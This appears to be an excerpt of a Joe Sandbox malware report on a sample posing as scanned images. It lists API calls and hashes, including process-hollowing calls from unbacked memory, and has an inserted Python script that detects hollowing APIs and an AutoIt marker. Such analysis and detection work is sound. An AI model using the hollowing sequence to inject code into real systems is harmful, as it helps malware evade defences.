                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: 7de60c6a23935ff4cfc42ff5a20318f5b774a6d206334b8a1b03bdc3849813d6
                                                        • Instruction ID: af40e52518ff1b49be6977ec9d20f39025a2ec0ff87dc457f58356369d93455c
                                                        • Opcode Fuzzy Hash: 7de60c6a23935ff4cfc42ff5a20318f5b774a6d206334b8a1b03bdc3849813d6
                                                        • Instruction Fuzzy Hash: 2101D23EA41B15DFEA157B75E942A6E72589FD2770F10002AF500AA1C3DB709D018761
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00A897D2,?,?,?,?,?,00000004), ref: 00A89B45
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A897D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00A89B5B
                                                        • CloseHandle.KERNEL32(00000000,?,00A897D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A89B62
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: db45d730df5d6dc7c58d6c1063fd394e64270b53ed2d76e642ac7a5defa5e91b
                                                        • Instruction ID: 0564dc68e0659246698f03169ca71420aae4cc4d483e51dd2177b358abb091b1
                                                        • Opcode Fuzzy Hash: db45d730df5d6dc7c58d6c1063fd394e64270b53ed2d76e642ac7a5defa5e91b
                                                        • Instruction Fuzzy Hash: ECE08632281315BFDB316BD4EC0DFDA7B18AB06761F144221FB64690E087B165129798
                                                        APIs
                                                        • _free.LIBCMT ref: 00A88FA5
                                                          • Part of subcall function 00A42F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00A49C64), ref: 00A42FA9
                                                          • Part of subcall function 00A42F95: GetLastError.KERNEL32(00000000,?,00A49C64), ref: 00A42FBB
                                                        • _free.LIBCMT ref: 00A88FB6
                                                        • _free.LIBCMT ref: 00A88FC8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
                                                        • Instruction ID: a5a28655bfb8c22d356a4e846bc07e8ed3b62d6711afd0f6b877e2372bc78d77
                                                        • Opcode Fuzzy Hash: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
                                                        • Instruction Fuzzy Hash: C9E012A16097114ACA24B678AE40B935BEE5F883907D8081DB50ADB142DE28FC558724
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        • Opcode ID: 31f19b8e32c4935767291f5fa68d881fbaaa73382f879a5b23c7d3913ada1151
                                                        • Instruction ID: c7a869097a150c27b5c2411c2a0a56d569b0fca27ecabf86e1a2b4460b3022df
                                                        • Opcode Fuzzy Hash: 31f19b8e32c4935767291f5fa68d881fbaaa73382f879a5b23c7d3913ada1151
                                                        • Instruction Fuzzy Hash: 4F224874508361CFCB24DF18D594B2ABBF1BF94300F15896DE89A8B262D731ED85CB92
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: EA06
                                                        • API String ID: 4104443479-3962188686
                                                        • Opcode ID: d5300e96a804ece685c4fb40ddc9328659b11fe549557ff9f11ce6677244a435
                                                        • Instruction ID: 474e1eabc92c989635d4e3a4c7923a41d08e0810adde51d077f57f714522848b
                                                        • Opcode Fuzzy Hash: d5300e96a804ece685c4fb40ddc9328659b11fe549557ff9f11ce6677244a435
                                                        • Instruction Fuzzy Hash: B6414931A041745BEF219B7CED517FE7FB6AB49300F694075EC829A286C6319D8487A1
                                                        APIs
                                                        • _strcat.LIBCMT ref: 00A9DE37
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • _wcscpy.LIBCMT ref: 00A9DEC6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                        • String ID:
                                                        • API String ID: 1012013722-0
                                                        • Opcode ID: dfae2d5080535e42677e845b3cf72ff7485201b5f488ff314b8fbfb3108dbe5e
                                                        • Instruction ID: 03a861f59ba4a9f293fc232c7cc3390d7a08ec8ecfb36b944f1a3b45a102ed1d
                                                        • Opcode Fuzzy Hash: dfae2d5080535e42677e845b3cf72ff7485201b5f488ff314b8fbfb3108dbe5e
                                                        • Instruction Fuzzy Hash: F3912935B00514DFCB18DF28D6829A9BBF1EF59314B55846AF85A8F362DB31ED81CB80
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 00A24992
                                                          • Part of subcall function 00A435AC: __lock.LIBCMT ref: 00A435B2
                                                          • Part of subcall function 00A435AC: DecodePointer.KERNEL32(00000001,?,00A249A7,00A781BC), ref: 00A435BE
                                                          • Part of subcall function 00A435AC: EncodePointer.KERNEL32(?,?,00A249A7,00A781BC), ref: 00A435C9
                                                          • Part of subcall function 00A24A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A24A73
                                                          • Part of subcall function 00A24A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A24A88
                                                          • Part of subcall function 00A23B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A23B7A
                                                          • Part of subcall function 00A23B4C: IsDebuggerPresent.KERNEL32 ref: 00A23B8C
                                                          • Part of subcall function 00A23B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AE62F8,00AE62E0,?,?), ref: 00A23BFD
                                                          • Part of subcall function 00A23B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00A23C81
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A249D2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 1438897964-0
                                                        • Opcode ID: 5c88e47996fba5c6a8e96480dbae690a937c74c45045cd620861e3c4ee115c09
                                                        • Instruction ID: be92a774a35b547806f363406c1f80b6eb713f7b65133a80ba4c2ba06224f76e
                                                        • Opcode Fuzzy Hash: 5c88e47996fba5c6a8e96480dbae690a937c74c45045cd620861e3c4ee115c09
                                                        • Instruction Fuzzy Hash: C11190B19043619FC700DFA8ED4594AFFF8EB99750F00492EF5458B2B1DB709946CB92
                                                        APIs
                                                          • Part of subcall function 00A4594C: __FF_MSGBANNER.LIBCMT ref: 00A45963
                                                          • Part of subcall function 00A4594C: __NMSG_WRITE.LIBCMT ref: 00A4596A
                                                          • Part of subcall function 00A4594C: RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00A41013,?), ref: 00A4598F
                                                        • std::exception::exception.LIBCMT ref: 00A4102C
                                                        • __CxxThrowException@8.LIBCMT ref: 00A41041
                                                          • Part of subcall function 00A487DB: RaiseException.KERNEL32(?,?,?,00ADBAF8,00000000,?,?,?,?,00A41046,?,00ADBAF8,?,00000001), ref: 00A48830
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: f3eac34e40b2206154f06ce0bbb55fa7905468859e97c4baefd46733535a932c
                                                        • Instruction ID: 6b966fda4d1659748a98aa828e0af70d44eaf29ef5e98eebf3552a61fba8784f
                                                        • Opcode Fuzzy Hash: f3eac34e40b2206154f06ce0bbb55fa7905468859e97c4baefd46733535a932c
                                                        • Instruction Fuzzy Hash: 09F0C83D54021DA7CB20BB68ED15ADF7BAC9F81350F100426F80496692EFB18AC092E5
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        • Opcode ID: 53945a40789775aa97a5dbee864382b101a4db04db63e7335aa41901081bb878
                                                        • Instruction ID: b81448e91477e5f33ddb0f87d12c752a03b4f474750efe0b0b94bf0bce7784a0
                                                        • Opcode Fuzzy Hash: 53945a40789775aa97a5dbee864382b101a4db04db63e7335aa41901081bb878
                                                        • Instruction Fuzzy Hash: BF018479C00608EBCF22AF799E0659E7B61AFC5760F148215B8145A1A2DF358A11EB91
                                                        APIs
                                                          • Part of subcall function 00A48D68: __getptd_noexit.LIBCMT ref: 00A48D68
                                                        • __lock_file.LIBCMT ref: 00A4561B
                                                          • Part of subcall function 00A46E4E: __lock.LIBCMT ref: 00A46E71
                                                        • __fclose_nolock.LIBCMT ref: 00A45626
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 72bb9b75032e9c7f3f0f0c78fb85fce557e74e83faee420d64e6c2d555e12528
                                                        • Instruction ID: bd277960ca180cec8d3bc9a5fc8f77e41519e2e7fc2aa087a5bbc91c9fab32ee
                                                        • Opcode Fuzzy Hash: 72bb9b75032e9c7f3f0f0c78fb85fce557e74e83faee420d64e6c2d555e12528
                                                        • Instruction Fuzzy Hash: 48F0B479C01A049FDB20BF759A0276EB7E16FC1B34F6A8209A415AB1C3CF7C89029B55
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01691A5B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01691AF1
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01691B13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1690000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction ID: a61dc899211f999e5e9ac67e74df09fbb7ebc33feaeba6b723e4735eaa3990c1
                                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction Fuzzy Hash: EF12CD24E24658C6EB24DF64D8507DEB232EF69300F1090E9910DEB7A5E77A4F81CB5A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 5eccdfab4a136f41a15f9f12361aac362e5b3292817913a4fd606d514f071c47
                                                        • Instruction ID: a7259a81bf32b66a45770074f7166c26651dcb64eefdc0b120c06b0c01d35031
                                                        • Opcode Fuzzy Hash: 5eccdfab4a136f41a15f9f12361aac362e5b3292817913a4fd606d514f071c47
                                                        • Instruction Fuzzy Hash: 8F41F574508351CFDB24DF18C584B1ABBF0BF95318F1989ACE8898B762C332E885CB52
                                                        APIs
                                                          • Part of subcall function 00A24D13: FreeLibrary.KERNEL32(00000000,?), ref: 00A24D4D
                                                          • Part of subcall function 00A4548B: __wfsopen.LIBCMT ref: 00A45496
                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00AE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A24F6F
                                                          • Part of subcall function 00A24CC8: FreeLibrary.KERNEL32(00000000), ref: 00A24D02
                                                          • Part of subcall function 00A24DD0: _memmove.LIBCMT ref: 00A24E1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: 0d77b15ea33326f9cf83164d1042f91960fbcbf3f3bb6225e83cf2da85feaf4f
                                                        • Instruction ID: 7e65093131e3ac9e666a0385630ee10f52af3ddc8e7e33c9ad4303069549fa57
                                                        • Opcode Fuzzy Hash: 0d77b15ea33326f9cf83164d1042f91960fbcbf3f3bb6225e83cf2da85feaf4f
                                                        • Instruction Fuzzy Hash: FD11EB32604725AFCB14FF78EE02BAE77A59F88701F108439F5419A1C1DA719A059750
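The three calls listed for the function at 01691A5B above (CreateProcessW, Wow64GetThreadContext, ReadProcessMemory) come from a dump whose source is marked "based on PE: false", i.e. code running from memory that is not backed by an image on disk, and the LoadLibraryExW call at 00A24F6F carries the >>>AUTOIT NO CMDEXECUTE<<< string among its arguments. The script below is an added example, not part of this Joe Sandbox report and not one of Joe Sandbox's own signatures: it parses entries in the format shown on this page and flags (a) functions in non-PE-backed memory that directly call several process-hollowing primitives, and (b) API calls whose arguments carry the AutoIt marker string. The sample input is copied from the entries on this page; the HOLLOWING_APIS list, the MIN_HITS threshold of three distinct direct calls, and the AutoIt marker rule are assumptions of this example and go beyond the three hollowing-related calls the report itself lists.

```python
"""Flag process-hollowing primitives and the AutoIt runtime marker in
Joe Sandbox 'APIs' / 'Memory Dump Source' entries.

Added example, not part of the Joe Sandbox report. The record format is
reproduced from this report's entries; HOLLOWING_APIS, MIN_HITS and the
AutoIt marker rule are assumptions of this example, not Joe Sandbox
signatures.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: copied from this report's entries for the
# non-PE-backed region at 01690000 and the AutoIt runtime region at 00A20000.
SAMPLE_REPORT = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01691A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01691AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01691B13
Memory Dump Source
• Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
APIs
  • Part of subcall function 00A24D13: FreeLibrary.KERNEL32(00000000,?), ref: 00A24D4D
• LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00AE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A24F6F
Memory Dump Source
• Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
"""

# One API row: optional 'Part of subcall function XXXX:' prefix, then
# Name.MODULE(args), ref: ADDR  (LIBCMT rows have no argument list).
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[^\s(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
SOURCE_RE = re.compile(
    r"Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)"
)

# Win32/native calls used by process hollowing. Assumption of this example,
# not a Joe Sandbox signature; the report above shows three of them.
HOLLOWING_APIS = {
    "CreateProcessW", "CreateProcessA", "CreateProcessInternalW",
    "NtUnmapViewOfSection", "ZwUnmapViewOfSection",
    "VirtualAllocEx", "NtAllocateVirtualMemory",
    "ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory",
    "GetThreadContext", "Wow64GetThreadContext",
    "SetThreadContext", "Wow64SetThreadContext",
    "ResumeThread", "NtResumeThread",
}
MIN_HITS = 3                  # distinct direct hollowing calls needed to flag
AUTOIT_MARKER = ">>>AUTOIT"   # prefix of the runtime string seen in the report


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int
    subcall: bool             # True for 'Part of subcall function' rows


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    offset: Optional[int] = None       # region base from 'Offset:'
    pe_backed: Optional[bool] = None   # 'based on PE: true/false'


def parse_report(text: str) -> list[FunctionEntry]:
    """Split the text into one FunctionEntry per 'APIs' section."""
    entries: list[FunctionEntry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            entries.append(FunctionEntry())
            continue
        if not entries:
            entries.append(FunctionEntry())
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            entries[-1].calls.append(ApiCall(
                name=m.group("name"), module=m.group("module"),
                args=args.split(",") if args is not None else [],
                ref=int(m.group("ref"), 16),
                subcall=m.group("sub") is not None))
            continue
        m = SOURCE_RE.search(line)
        if m:
            entries[-1].offset = int(m.group("off"), 16)
            entries[-1].pe_backed = m.group("pe") == "true"
    return entries


def find_hollowing(entries, min_hits=MIN_HITS):
    """Non-PE-backed functions that directly call >= min_hits hollowing APIs."""
    findings = []
    for e in entries:
        hits = sorted({c.name for c in e.calls
                       if not c.subcall and c.name in HOLLOWING_APIS})
        if e.pe_backed is False and len(hits) >= min_hits:
            findings.append((e.offset, hits))
    return findings


def find_autoit_marker(entries):
    """Calls whose arguments carry the AutoIt runtime marker string."""
    return [(e.offset, c.name) for e in entries for c in e.calls
            if any(AUTOIT_MARKER in a for a in c.args)]


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_REPORT)
    for off, apis in find_hollowing(parsed):
        print(f"hollowing primitives in unbacked region {off:08X}: {', '.join(apis)}")
    for off, api in find_autoit_marker(parsed):
        print(f"AutoIt marker passed to {api} in region {off:08X}")
```

Subcall rows ("Part of subcall function ...") are parsed but excluded from the hollowing count, so a parent that only reaches the primitives through helpers is not flagged; lower min_hits or drop the subcall filter if that is wanted. The PE-backed check is what separates this from the AutoIt runtime's own CreateProcess use at 00A20000, which is image-backed and would not be reported even if it met the threshold.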
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: b125bdef4d49f9b1c9dfc4e20efc2a4c5ac9fb8c32c97cf52522fc9fbee46a53
                                                        • Instruction ID: 62b3ee8204a8f206734298dfb58fd3a86f6d813904c03e208aec239598e755b1
                                                        • Opcode Fuzzy Hash: b125bdef4d49f9b1c9dfc4e20efc2a4c5ac9fb8c32c97cf52522fc9fbee46a53
                                                        • Instruction Fuzzy Hash: 3B211374508361CFCB24DF68D544A1BBBF0BF89314F058968E88A47761D731E885CB52
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 06786a75e538d6049ff635853d8990689110bddc0b31655e3336a3db740df019
                                                        • Instruction ID: 2a7d5ca59d1b34d0fe2b28fbed730f3a0357a75bfca3d83a1014701baac2b5d4
                                                        • Opcode Fuzzy Hash: 06786a75e538d6049ff635853d8990689110bddc0b31655e3336a3db740df019
